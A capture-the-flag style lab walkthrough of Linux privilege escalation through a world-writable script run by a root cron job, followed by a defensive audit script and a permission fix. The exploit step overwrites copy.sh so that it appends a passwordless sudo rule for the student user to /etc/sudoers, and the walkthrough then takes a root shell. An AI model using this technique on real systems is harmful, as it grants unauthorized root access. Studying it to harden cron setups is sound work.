# Cron Jobs

```
whoami
groups student
cat /etc/passwd
crontab -l
```


```
ls -l
	-rw------- 1 root root 26 Sep 23  2018 message
# "message" file has root permissions
```

**Root has stored a file in the `student` home directory that only root can access. Let's find out why it is there.**

## Identify Cron Jobs

* Look for all occurrences of the path or the file on the system

```
find / -name message
    /home/student/message
	find: '/var/lib/apt/lists/partial': Permission denied
    [...]
    /tmp/message
```

```
grep -rnw /usr -e "/home/student/message"
	/usr/local/share/copy.sh:2:cp /home/student/message /tmp/message
```

* The file has been copied into the `/tmp` directory
* The path also appears in the `copy.sh` script

```
cat /tmp/message
	Hey!! you are not root :(
```

* Check `copy.sh` privileges

```
ls -al /usr/local/share/copy.sh
	-rwxrwxrwx 1 root root 74 Sep 23  2018 /usr/local/share/copy.sh
	
cat /usr/local/share/copy.sh
    #! /bin/bash
    cp /home/student/message /tmp/message
    chmod 644 /tmp/message
```

#### Privesc <a href="#privesc" id="privesc"></a>

* Every user account has read/write/execute permissions on the `copy.sh` script
* The script is writable by the `student` user. Modify the script to execute a command (e.g. *adding **student** to the `sudoers` file*).
  * When the script is executed by the `root` cron job (*every 1 min for this lab*), it will run the commands with privileged permissions
  * No text editors are available in the lab

```
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh

cat /usr/local/share/copy.sh
    #!/bin/bash
    echo "student ALL=NOPASSWD:ALL" >> /etc/sudoers
```

```
sudo -l

    User student may run the following commands on attackdefense:
        (root) NOPASSWD: /etc/init.d/cron
        (root) NOPASSWD: ALL
```


```
sudo su
whoami
	root
```
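
The root cause in this lab is a root-run cron script with mode `-rwxrwxrwx`. The following audit script is an added example, not part of the original page: it lists the absolute paths referenced in crontab-format files and flags any script that is group- or world-writable, or that sits in such a directory. It assumes cron entries call their commands by absolute path; the function names are illustrative.

```shell
#!/bin/sh
# Added example, not from the original page: flag cron-run scripts that a
# non-root user could modify, like the -rwxrwxrwx copy.sh found above.
# Assumption: cron entries reference their commands by absolute path.

# Print each absolute path mentioned in the given crontab-format files.
cron_paths() {
    grep -hv '^[[:space:]]*#' "$@" 2>/dev/null |
        grep -oE '(^|[[:space:]])/[^[:space:];|&<>]+' |
        tr -d ' \t' | sort -u
}

# Succeed if the path (symlinks followed) is group- or world-writable.
loose_mode() {
    [ -n "$(find -L "$1" -maxdepth 0 \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Print one finding per risky script; exit status 1 if anything was found.
audit_cron() {
    cron_paths "$@" | (
        rc=0
        while IFS= read -r p; do
            [ -f "$p" ] || continue            # only regular files
            if loose_mode "$p"; then
                echo "WRITABLE-FILE $p"; rc=1
            elif loose_mode "$(dirname "$p")"; then
                # Whoever can write the directory can replace the script
                # (unless the sticky bit is set); flag it for review.
                echo "WRITABLE-DIR  $p"; rc=1
            fi
        done
        exit "$rc"
    )
}

# Usage (script name is arbitrary): sh audit.sh /etc/crontab /etc/cron.d/*
if [ "$#" -gt 0 ]; then
    audit_cron "$@"
fi
```

For the finding in this lab, removing group and other write permission from the root-owned script (for example `chmod 755`) closes the path.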

